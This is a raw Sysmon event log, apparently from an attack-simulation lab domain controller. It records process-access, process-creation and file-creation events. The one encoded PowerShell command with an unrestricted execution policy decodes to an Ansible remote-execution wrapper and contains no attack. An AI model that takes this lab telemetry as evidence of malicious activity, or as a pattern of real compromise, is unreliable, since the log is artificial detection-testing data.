13:54:07.631{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003419Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.631{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003418Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.631{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003417Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.631{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003416Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.631{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003415Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.631{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003414Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.631{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-857F-5FCF-A600-000000009101}1252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003413Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.631{10ACEC4A-857F-5FCF-A500-000000009101}33281184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-857F-5FCF-A600-000000009101}1252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66db258b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253195(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66252e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66d0474b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662139fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66271ecb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662553c1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66247346(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253879(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+6625346c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253195(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66252e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66d0474b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66239cc7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66239297(wow64) 154100x80000000000000003412Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.636{10ACEC4A-857F-5FCF-A600-000000009101}1252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-857E-5FCF-ED48-060000000000}0x648ed0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-857F-5FCF-A500-000000009101}3328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 10341000x80000000000000003411Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.569{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-857F-5FCF-A500-000000009101}3328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003410Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.569{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-857F-5FCF-A500-000000009101}3328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003409Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.538{10ACEC4A-857F-5FCF-A500-000000009101}3328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_a1pvrgnd.fge.ps12020-12-08 13:54:07.538 10341000x80000000000000003408Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.522{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-857F-5FCF-A500-000000009101}3328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003407Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-857E-5FCF-9D00-000000009101}49404980C:\Windows\system32\conhost.exe{10ACEC4A-857F-5FCF-A500-000000009101}3328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003406Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003405Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 